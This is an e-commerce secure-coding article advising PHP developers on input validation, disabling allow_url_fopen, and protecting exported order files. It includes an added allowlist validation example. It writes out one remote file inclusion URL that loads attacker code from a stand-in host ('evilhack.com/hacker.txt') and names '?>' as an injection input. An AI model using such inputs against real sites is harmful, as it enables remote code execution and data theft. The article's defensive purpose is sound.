Security needs to be a major consideration when developing an e-commerce website or software. A developer needs to be aware of all the security considerations when designing a site. With e-commerce becoming more commonplace these days, the number of security attacks is certainly increasing. Paranoia is a healthy thing for e-commerce site developers: we need to keep up to date with security issues, and keep our ears and eyes open. Though the following loopholes are serious, they are easily fixed if present. Listed below are some security considerations to be included when developing a site. This article does not cover e-shoplifting; please see my separate article on this.

User input: every input, whether it be entering a quantity, searching for a product, entering a name etc., needs to be validated for suspicious characters. If this is not done, it is possible to enter “?>”, the closing tag of PHP, and execute some PHP code. It is far safer to allow only the letters a-z (capitals included) and the digits 0-9 and nothing else, rather than make a list of all the characters that shouldn’t be there. The validation script needs to step through each character one by one. This needs to be done in server-side validation, not JavaScript. Using server-side input validation is essential to keep out unwanted characters.

There exists another major loophole when executing PHP code. PHP has a setting called allow_url_fopen which enables the opening of files by URL from a PHP script. This setting should be turned off, unless absolutely necessary. Just imagine you have PHP scripts for both fixed headers and footers, and to access your web pages you would type in http://www.mysite.com/index.php?page=page2. All it takes to run a script is for a malicious user to modify this parameter by typing in “http://www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt”, with some PHP code in the file “hacker.txt”. Anything could happen: PHP files read or deleted, vital information stolen.

If you are not sure whether this setting is on or off, copy the following PHP code into a text file and upload it to your web server:

<?php phpinfo(); ?>

When you access this script on your web server, you should come across the setting allow_url_fopen under the configuration section. A computer user, under normal circumstances, cannot find the value of this setting.

Be careful of exported data like orders and products in CSV and MySQL files. Problems arise if this data is exported from a script and is kept on the web server under a common file name, i.e. http://www.mysite.com/admin/output_tables.csv. This is only really a problem when the exported data resides in a file in a directory that is publicly accessible. There are two ways to prevent this security loophole: first, have the output file behind a password-protected directory; secondly, have the data located inside an HTML textarea form element on a script. The store owner can then copy this information from the textarea, create a new file on their computer and paste the information there. All it takes is for a hacker to find this filename by checking out the e-commerce software’s demo website and then look for the same filename on a real site.
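One way to handle the page parameter from the index.php?page=page2 example above: the character-by-character a-z/0-9 check is combined with a fixed list of page names, so that neither “?>” nor a remote URL ever reaches include. This is an added example, not code from the original article; the function names, the pages directory and the page list are assumptions, and it needs PHP 7.1 or later.

```php
<?php
// Added example. PAGES_DIR, ALLOWED_PAGES, is_safe_token() and resolve_page()
// are hypothetical names; the page list is a constructed sample.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'page2', 'contact'];

// Walk the input one character at a time; accept only a-z, A-Z and 0-9.
function is_safe_token(string $value, int $maxLen = 32): bool
{
    $len = strlen($value);
    if ($len === 0 || $len > $maxLen) {
        return false;
    }
    for ($i = 0; $i < $len; $i++) {
        $c = ord($value[$i]);
        $ok = ($c >= 48 && $c <= 57)      // 0-9
           || ($c >= 65 && $c <= 90)      // A-Z
           || ($c >= 97 && $c <= 122);    // a-z
        if (!$ok) {
            return false;
        }
    }
    return true;
}

// Map the request value to a local file, or null if it must be refused.
function resolve_page($raw): ?string
{
    if (!is_string($raw) || !is_safe_token($raw)) {
        return null;   // "?>", "../x" and "http://..." all fail here
    }
    if (!in_array($raw, ALLOWED_PAGES, true)) {
        return null;   // well-formed, but not a page this site serves
    }
    return PAGES_DIR . '/' . $raw . '.php';
}

// Constructed inputs, including the two values the article warns about.
$samples = ['page2', 'Page9', '?>', 'http://www.evilhack.com/hacker.txt', ['x']];
foreach ($samples as $s) {
    printf("%-45s %s\n", json_encode($s), resolve_page($s) ?? 'REFUSED');
}
// Remote include also needs allow_url_include (PHP 5.2+); both should be off.
foreach (['allow_url_fopen', 'allow_url_include'] as $key) {
    printf("%s = %s\n", $key, var_export(ini_get($key), true));
}
// In index.php: $p = resolve_page($_GET['page'] ?? 'home');
//               if ($p === null) { http_response_code(404); exit; } include $p;
```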
Article Source: http://modirac.com
Paul Roberts
I run a software development company specialising in E-Commerce, Search Engine Optimization, and Print Estimation software called ROBO Design Solutions. I also develop New Zealand E-Commerce Solutions and Software under the name ROBO Design.